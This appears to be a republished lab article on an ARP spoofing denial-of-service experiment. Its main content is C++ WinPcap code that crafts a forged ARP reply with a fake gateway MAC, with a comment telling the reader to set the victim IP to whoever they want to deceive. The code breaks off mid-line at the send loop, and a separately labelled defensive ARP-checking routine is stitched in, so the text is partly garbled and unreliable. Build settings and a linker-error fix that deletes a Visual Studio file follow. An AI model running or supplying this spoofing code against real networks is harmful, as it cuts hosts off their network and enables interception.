Shulou (Shulou.com) 06/01 Report, updated 2025-01-22
Experimental principle:
A forged ARP reply is sent to host A. It claims the IP address of host B, but the MAC address is set to a hardware address that does not exist. After receiving this message, host A refreshes the IP-to-MAC mapping for host B in its ARP cache with the wrong value, and network communication between host A and host B is interrupted. This is a denial-of-service (DoS) attack. The popular "network law enforcement" software uses the same ARP spoofing mechanism: it sends the wrong gateway MAC address to unauthorized users to interrupt their communication.
In an ARP spoofing run initiated by 172.28.15.3 in the name of 172.28.15.33, the attacker sent a series of ARP request packets. On the surface it looks as if the gateway 172.28.15.33 is looking up the MAC address of each host in the network, but in fact the attacker is broadcasting to tell every host that the MAC address of 172.28.15.33 is "C8-9c-dc-22-61-d0". When a host receives the broadcast, it replaces the original entry in its ARP cache with the forged MAC address, and the fake MAC address is what you see when you check with the "arp -a" command.
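A defender-side check for the forged frames described above, as an added example that is not part of the original article. It flags an ARP frame whose Ethernet source MAC differs from the sender MAC inside the ARP body (the experiment's frame has exactly this mismatch) or whose IP-to-MAC claim contradicts a trusted table; the function name, flag names, trusted table and sample frames are assumptions constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum { ARP_OK = 0, ARP_NOT_ARP = 1, ARP_SRC_MISMATCH = 2, ARP_BINDING_CHANGED = 4 };

/* Trusted IP-to-MAC binding (assumed to come from a static table or DHCP records). */
struct binding { uint8_t ip[4]; uint8_t mac[6]; };

/* Inspect one raw Ethernet frame and return a bitmask of the flags above. */
int check_arp_frame(const uint8_t *f, size_t len,
                    const struct binding *known, size_t n_known)
{
    /* EtherType 0x0806, hardware type 1, protocol 0x0800, address lengths 6 and 4 */
    static const uint8_t arp_eth_ipv4[] = { 0x08, 0x06, 0x00, 0x01, 0x08, 0x00, 6, 4 };
    int flags = ARP_OK;
    /* 14-byte Ethernet header + 28-byte ARP body */
    if (len < 42 || memcmp(f + 12, arp_eth_ipv4, sizeof arp_eth_ipv4) != 0)
        return ARP_NOT_ARP;
    const uint8_t *eth_src = f + 6, *sender_mac = f + 22, *sender_ip = f + 28;
    /* A genuine host puts its own MAC in both the Ethernet header and the ARP body. */
    if (memcmp(eth_src, sender_mac, 6) != 0)
        flags |= ARP_SRC_MISMATCH;
    /* The claimed mapping must agree with the trusted table. */
    for (size_t i = 0; i < n_known; i++)
        if (!memcmp(known[i].ip, sender_ip, 4) && memcmp(known[i].mac, sender_mac, 6))
            flags |= ARP_BINDING_CHANGED;
    return flags;
}

/* Constructed sample data: 192.0.2.1 is the gateway, really at 02:00:00:00:00:01. */
static const struct binding KNOWN[] = { { {192, 0, 2, 1}, {2, 0, 0, 0, 0, 0x01} } };
static const uint8_t FORGED[42] = {
    2,0,0,0,0,0x0a,  2,0,0,0,0,0x0b,  0x08,0x06,   /* dst, src, EtherType */
    0,1, 8,0, 6, 4, 0,2,                           /* ARP header, opcode 2 (reply) */
    2,0,0,0,0,0x0c,  192,0,2,1,                    /* sender MAC (bogus), sender IP */
    2,0,0,0,0,0x0a,  192,0,2,10 };                 /* target MAC, target IP */
static const uint8_t GENUINE[42] = {
    2,0,0,0,0,0x0a,  2,0,0,0,0,0x01,  0x08,0x06,
    0,1, 8,0, 6, 4, 0,2,
    2,0,0,0,0,0x01,  192,0,2,1,
    2,0,0,0,0,0x0a,  192,0,2,10 };

int main(void)
{
    printf("forged:  flags=%d\n", check_arp_frame(FORGED, sizeof FORGED, KNOWN, 1));
    printf("genuine: flags=%d\n", check_arp_frame(GENUINE, sizeof GENUINE, KNOWN, 1));
    return 0;
}
```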
Experimental code and steps:
// 123.cpp: defines the entry point for the console application.
#include "stdafx.h"
#include <pcap.h>
int _tmain(int argc, _TCHAR* argv[])
{
    pcap_if_t *allAdapters;              // adapter list
    pcap_if_t *adapter;
    pcap_t *adapterHandle;               // adapter handle
    u_char packet[1020];                 // data packet to be sent
    char errorBuffer[PCAP_ERRBUF_SIZE];  // error message buffer
    if (pcap_findalldevs_ex(PCAP_SRC_IF_STRING, NULL, &allAdapters, errorBuffer) == -1)
    {   // retrieve all network adapters connected to the machine
        fprintf(stderr, "Error in pcap_findalldevs_ex function: %s\n", errorBuffer);
        return -1;
    }
    if (allAdapters == NULL)
    {   // no adapters exist
        printf("\nNo adapters found! Make sure WinPcap is installed.\n");
        return 0;
    }
    int crtAdapter = 0;
    for (adapter = allAdapters; adapter != NULL; adapter = adapter->next)
    {   // walk the list and print each adapter's name and description
        printf("\n%d.%s", ++crtAdapter, adapter->name);
        printf("-- %s\n", adapter->description);
    }
    printf("\n");
    // select an adapter
    int adapterNumber;
    printf("Enter the adapter number between 1 and %d:", crtAdapter);
    scanf_s("%d", &adapterNumber);
    if (adapterNumber < 1 || adapterNumber > crtAdapter)
    {
        printf("\nAdapter number out of range.\n");
        pcap_freealldevs(allAdapters);   // release the adapter list
        return -1;
    }
    adapter = allAdapters;
    for (crtAdapter = 0; crtAdapter < adapterNumber - 1; crtAdapter++)
        adapter = adapter->next;
    // open the specified adapter
    adapterHandle = pcap_open(adapter->name,   // name of the adapter
        65536,                       // portion of the packet to capture
                                     // 65536 guarantees that the whole
                                     // packet will be captured
        PCAP_OPENFLAG_PROMISCUOUS,   // promiscuous mode
        1000,                        // read timeout: 1000 ms
        NULL,                        // authentication on the remote machine
        errorBuffer                  // error buffer
    );
    if (adapterHandle == NULL)
    {   // the specified adapter failed to open
        fprintf(stderr, "\nUnable to open the adapter %s\n", adapter->name);
        // release the adapter list
        pcap_freealldevs(allAdapters);
        return -1;
    }
    pcap_freealldevs(allAdapters);   // release the adapter list
    // create the data packet
    packet[0] = 0xc8; packet[1] = 0x9c; packet[2] = 0xdc; packet[3] = 0x22; packet[4] = 0x6c; packet[5] = 0x58;   // MAC address of the deceived computer
    packet[6] = 0xc8; packet[7] = 0x9c; packet[8] = 0xdc; packet[9] = 0x22; packet[10] = 0x62; packet[11] = 0x0f; // your own MAC address
    packet[12] = 0x08; packet[13] = 0x06; // Ethernet encapsulating the ARP protocol (do not change)
    packet[14] = 0x00; packet[15] = 0x01; // ARP field 1: hardware type, Ethernet
    packet[16] = 0x08; packet[17] = 0x00; // ARP field 2: protocol type, IP
    packet[18] = 0x06;                    // ARP field 3: length of the layer 2 address
    packet[19] = 0x04;                    // ARP field 4: length of the layer 3 address
    packet[20] = 0x00; packet[21] = 0x02; // ARP field 5: this is an ARP reply message; ARP fields 6, 7, 8 and 9 follow
    packet[22] = 0xc8; packet[23] = 0x9c; packet[24] = 0xdc; packet[25] = 0x22; packet[26] = 0x62; packet[27] = 0x06; // false gateway MAC address
    packet[28] = 0xac; packet[29] = 0x1c; packet[30] = 0x0f; packet[31] = 0xfe; // IP of the gateway, here 172.28.15.254 (not needed in our lab)
    packet[32] = 0xc8; packet[33] = 0x9c; packet[34] = 0xdc; packet[35] = 0x22; packet[36] = 0x61; packet[37] = 0xd0; // MAC address of the deceived computer
    packet[38] = 0xac; packet[39] = 0x1c; packet[40] = 0x0f; packet[41] = 0x21; // IP address of the deceived computer, here 172.28.15.33 (change it to the IP of whoever you want to deceive)
    // send data packets
    for (int ssde=0;ssde
Project --> (123) Properties (Alt+F7)
Configuration Properties --> Manifest Tool --> Input and Output --> Embed Manifest --> No
Project --> (123) Properties (Alt+F7)
Configuration Properties --> C/C++ --> General --> Additional Include Directories --> (select the Include folder under C:\WpdPack)
Project --> (123) Properties (Alt+F7)
Configuration Properties --> Linker --> General --> Additional Library Directories --> (select the Lib folder under C:\WpdPack)
Project --> (123) Properties (Alt+F7)
Configuration Properties --> Linker --> Input --> Additional Dependencies --> append ";Packet.lib;wpcap.lib;Ws2_32.lib;"
Project --> (123) Properties (Alt+F7)
Configuration Properties --> C/C++ --> Preprocessor --> Preprocessor Definitions --> append ";HAVE_REMOTE"
LINK : fatal error LNK1123: failure during conversion to COFF: file invalid or corrupt
Step 1: under Project --> Project Properties --> Configuration Properties --> Linker --> Manifest File --> Embed Manifest, change "Yes" to "No". If that does not solve the problem, move on to the second step.
Step 2: check whether your computer runs a 64-bit operating system. If so, continue as follows.
Find out whether there are two copies of cvtres.exe:
C:\Program Files (x86)\Microsoft Visual Studio 10.0\vc\bin\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Right-click each file --> Properties --> Details, compare the two version numbers, then delete or rename the older version, or reset the Path variable.
The second step fixes the root cause: after the old version of cvtres.exe is deleted, you no longer need to change the manifest setting for every project.
For example: del C:\"Program Files (x86)"\"Microsoft Visual Studio 10.0"\VC\bin\cvtres.exe